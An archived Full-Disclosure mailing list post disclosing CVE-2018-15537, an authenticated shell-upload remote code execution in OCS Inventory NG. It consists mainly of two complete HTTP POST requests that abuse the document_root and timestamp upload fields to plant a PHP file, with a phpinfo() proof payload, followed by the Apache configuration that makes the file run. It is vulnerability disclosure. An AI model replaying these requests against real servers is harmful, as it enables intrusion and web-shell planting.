lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 13 Nov 2018 15:07:06 +0000
From: Simon Uvarov via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] OCS Inventory NG ocsreports Authenticated RCE via Shell Upload
	(CVE-2018-15537)

## Request 1

This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.

    POST /ocsreports/index.php?function=tele_package HTTP/1.1
    Host: 192.168.5.135
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
    Content-Type: multipart/form-data; boundary=---------------------------491299511942
    Content-Length: 2836
    Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------491299511942
    Content-Disposition: form-data; name="CSRF_10"

    8ab3df2f9a2078530027e74191af0b087429ad41
    -----------------------------491299511942
    Content-Disposition: form-data; name="document_root"

    /usr/share/ocsinventory-reports/ocsreports/
    -----------------------------491299511942
    Content-Disposition: form-data; name="timestamp"

    a.php.a
    -----------------------------491299511942
    Content-Disposition: form-data; name="NAME"

    dshasdgasga
    -----------------------------491299511942
    Content-Disposition: form-data; name="DESCRIPTION"

    asdgasdga
    -----------------------------491299511942
    Content-Disposition: form-data; name="OS"

    WINDOWS
    -----------------------------491299511942
    Content-Disposition: form-data; name="PROTOCOLE"

    HTTP
    -----------------------------491299511942
    Content-Disposition: form-data; name="PRIORITY"

    5
    -----------------------------491299511942
    Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
    Content-Type: application/x-zip-compressed

    <?php

    phpinfo();

    ?>
    -----------------------------491299511942
    Content-Disposition: form-data; name="ACTION"

    EXECUTE
    -----------------------------491299511942
    Content-Disposition: form-data; name="ACTION_INPUT"

    asdgasdgasdg
    -----------------------------491299511942
    Content-Disposition: form-data; name="REDISTRIB_USE"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

    d:\tele_ocs
    -----------------------------491299511942
    Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

    5
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_USER"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_TEXT"

    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"

    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NEED_DONE_ACTION"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"

    -----------------------------491299511942
    Content-Disposition: form-data; name="valid"

    Send
    -----------------------------491299511942
    Content-Disposition: form-data; name="digest_algo"

    MD5
    -----------------------------491299511942
    Content-Disposition: form-data; name="digest_encod"

    Hexa
    -----------------------------491299511942
    Content-Disposition: form-data; name="download_rep_creat"

    /var/www/html/download/server/
    -----------------------------491299511942--

## Request 2

    This request renames the file to a.php.a-1 and also creates info file.

    POST /ocsreports/index.php?function=tele_package HTTP/1.1
    Host: 192.168.5.135
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
    Content-Type: multipart/form-data; boundary=---------------------------4827543632391
    Content-Length: 3345
    Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------4827543632391
    Content-Disposition: form-data; name="CSRF_13"

    53b6eab749060aa8cbe972e9c9a31ae148cf886b
    -----------------------------4827543632391
    Content-Disposition: form-data; name="tailleFrag"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="nbfrags"

    1
    -----------------------------4827543632391
    Content-Disposition: form-data; name="comment"

    asdgasdga
    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest"

    b14f8d3b56fb10f2257f53ab32947a50
    -----------------------------4827543632391
    Content-Disposition: form-data; name="VALID_END"

    END
    -----------------------------4827543632391
    Content-Disposition: form-data; name="SIZE"

    347
    -----------------------------4827543632391
    Content-Disposition: form-data; name="document_root"

    /usr/share/ocsinventory-reports/ocsreports/
    -----------------------------4827543632391
    Content-Disposition: form-data; name="timestamp"

    a.php.a
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NAME"

    dshasdgasga
    -----------------------------4827543632391
    Content-Disposition: form-data; name="DESCRIPTION"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="OS"

    WINDOWS
    -----------------------------4827543632391
    Content-Disposition: form-data; name="PROTOCOLE"

    HTTP
    -----------------------------4827543632391
    Content-Disposition: form-data; name="PRIORITY"

    5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="teledeploy_file"; filename=""
    Content-Type: application/octet-stream

    -----------------------------4827543632391
    Content-Disposition: form-data; name="ACTION"

    EXECUTE
    -----------------------------4827543632391
    Content-Disposition: form-data; name="ACTION_INPUT"

    asdgasdgasdg
    -----------------------------4827543632391
    Content-Disposition: form-data; name="REDISTRIB_USE"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

    d:\tele_ocs
    -----------------------------4827543632391
    Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

    5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_USER"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_TEXT"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NEED_DONE_ACTION"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest_algo"

    MD5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest_encod"

    Hexa
    -----------------------------4827543632391
    Content-Disposition: form-data; name="download_rep_creat"

    /var/www/html/download/server/
    -----------------------------4827543632391--

# Apache Config

The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:

    AddType application/x-httpd-php .php

Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext

Regards,
Simon Uvarov

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists